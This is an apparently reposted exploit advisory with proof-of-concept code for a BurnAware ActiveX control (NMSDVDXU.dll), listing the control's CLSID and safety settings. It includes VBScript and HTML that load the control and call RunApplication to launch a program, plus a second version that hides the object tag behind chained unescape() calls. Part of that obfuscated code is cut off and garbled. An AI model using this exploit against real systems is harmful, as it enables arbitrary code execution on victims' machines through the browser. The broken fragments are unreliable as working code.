BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

-----------------------------------------------------------------------------
     BurnAware NMSDVDXU ActiveX Control Remote Arbitrary File Creation/Execution
     url: http://www.burnaware.com File: NMSDVDXU.dll <= 1.0.0.13
     CLSID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
     ProgID: NMSDVDX.DVDEngineX.1
     Descr.: DVDEngineX Class Marked as:
     RegKey Safe for Script: False
     RegKey Safe for Init: False
     Implements IObjectSafety: True
     IDisp Safe: Safe for untrusted: caller,data
     IPersist Safe: Safe for untrusted: caller,data
     IPStorage Safe: Safe for untrusted: caller,data Author: shinnai
     mail: shinnai[at]autistici[dot]org
     site: http://www.shinnai.net This was written for educational purpose. Use it at your own risk.
     Author will be not responsible for any damage. Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 myMsinfo is just hexadecimal values of: <object classid='clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8' id='compatUI'></object>
     <script language='vbscript'>
     compatUI.RunApplication 1, "calc.exe", 1
     </script>
     -----------------------------------------------------------------------------
     <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'>
     Sub tryMe
     myMsinfo = unescape("     unescape("'clsid:0355854A-") & _
     unescape("7F23-47E2-B7C3-9") & _
     unescape("7EE8DD42CD8' id=") & _
     unescape("'compatUI'>     unescape("ect>

本站为非盈利性Windows学术网站,所有文章均为学术研究用途,若有任何权利问题请联系管理员QQ:605358336